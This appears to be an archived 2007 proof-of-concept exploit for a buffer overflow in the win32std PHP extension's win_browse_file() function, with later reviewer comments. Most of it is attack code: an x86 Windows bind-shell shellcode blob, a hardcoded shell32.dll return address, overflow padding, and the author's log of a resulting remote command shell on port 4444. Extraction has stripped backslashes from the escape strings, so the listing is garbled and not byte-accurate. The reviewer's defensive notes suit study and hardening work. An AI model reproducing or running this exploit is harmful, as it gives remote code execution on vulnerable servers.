
php523browse-overflow.txt

Posted on 24 August 2007

<?php
/*
 * Proof-of-concept that passes an over-long string to win_browse_file(),
 * a function provided by the optional win32std extension. The page title
 * (php523browse-overflow) suggests the affected build is PHP 5.2.3.
 *
 * Author's original notes (kept as published):
 *   Inphex
 *   317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 ,
 *   Windows TinyXP - vm.
 *   GET /script.php HTTP/1.1
 *   telnet 192.168.2.32 4444
 *   Microsoft Windows XP [Version 5.1.2600]
 *   (C) Copyright 1985-2001 Microsoft Corp.
 *   C:apache>
 *   7ffdf020 7c911005 7c9110ed 00000001 00000000
 *   shoutz go to Kevin Finisterre
 *
 * NOTE(review): the script has to run inside the target's own PHP
 * interpreter (the notes show it being requested as /script.php), so the
 * exposure is presumably a host where untrusted users can upload or run
 * PHP, with native code then running as the web-server account -- confirm
 * against the deployment in question.
 *
 * NOTE(review): this listing is not byte-accurate. The page's extraction
 * has dropped characters (the prompt above reads "C:apache>"), so do not
 * derive signatures or hashes from the strings below.
 *
 * Defensive takeaways:
 *   - Do not load win32std unless it is required, or list
 *     win_browse_file in php.ini disable_functions.
 *   - The notes describe a command shell bound to TCP port 4444: alert on
 *     the web server / PHP process opening a listening socket or spawning
 *     cmd.exe, and block unsolicited inbound ports at the host firewall.
 *   - The value named $eip is a fixed address the author attributes to
 *     shell32.dll, which ties the sample to one specific Windows build.
 */

// Stop early when the extension that provides win_browse_file() is not loaded.
if(!function_exists('win_browse_file')) { die('win32std extension is not available'); }

// Payload bytes; the author's notes describe them as a 317-byte x86 bind shell.
$shellcode=
"x2bxc9xb1x51xbaxbbxb2xd5x31xdaxdaxd9x74x24xf4".
"x58x31x50x0ex83xc0x04x03xebxb8x37xc4xf7xd7x5c".
"x6axefxd1x5cx8ax10x41x28x19xcaxa6xa5xa7x2ex2c".
"xc5x22x36x33xd9xa6x89x2bxaexe6x35x4dx5bx51xbe".
"x79x10x63x2exb0xe6xfdx02x37x26x89x5dxf9x6dx7f".
"x60x3bx9ax74x59xefx79x5dxe8xeax09xc2x36xf4xe6".
"x9bxbdxfaxb3xe8x9ex1ex45x04x23x33xcex53x4fx6f".
"xccx02x4cx5ex37xa0xd9xe2xf7xa2x9dxe8x7cxc4x01".
"x5cx09x65x31xc0x66xe8x0fxf2x9axa4x70xdcx05x16".
"xe8x89xfaxaax9cx3ex8exf8x03x95x8fx2dxd3xdex9d".
"x32x18xb1xa2x1dx01xb8xb8xc4x3cx57x4ax0bx6bxc2".
"x49xf4x43x7ax97x03x96xd6x70xebx8ex7ax2cx40x7d".
"x2ex91x35xc2x83xeax6axa2x4bx04xd7x4cxdfxafx06".
"x05xb7x0bxd2x55x8fx03x1cx43x65xbcxb3x3ex85x6c".
"x5bx64xd4xa3x75x33xd8x6axd6xeexd9x43xb1xf5x6f".
"xe2x0bxa2x90x3cxdbx18x3bx94x23x70x50x7ex3bx09".
"x91x06x94x16xcbxacxe5x38x92x24x7exdex33xdax13".
"x97x21x76xbcxfex80x4bxb5xe7xb9x17x4fx05x0cx58".
"xbcx63x91x1ax6ex8dx2cxb7xe3xfcxcbxffxa8x55x80".
"x68xddx57x64x7exdexd2xcfx80xf6x47x87x2cxa6x26".
"x76xbbx49x99x29x6ex1bxe6x1axf8x36xc1x9ex37x1b".
"x0ex76xadx63x0fx40xcdx4cx64xf8xcdxeexbex63xd1".
"x27x6cx93xfdxa0x60xe1xfax6fxd3x09xd4x6fx03xf5".
"xd9x8f";

// Four-byte value placed directly after the 260-byte filler; the author
// labels it as an address inside shell32.dll.
$eip = "xDCx1Cx9Cx7C"; //shell32.dll

// The third argument is the crafted string: 260 filler bytes, $eip, more
// fixed bytes, then the payload padded with "C" on both sides.
// NOTE(review): 260 equals Windows MAX_PATH, which suggests the extension
// copies this argument into a fixed-size path buffer without a length
// check -- inferred from the layout, confirm against the win32std source.
win_browse_file( 1, NULL, str_repeat( "A", 260 )."".$eip."XXXXx20xf0xfdx7f".str_repeat("C",500).$shellcode.str_repeat("C",300), NULL, array( "*" => "*.*" ) );
?>

 
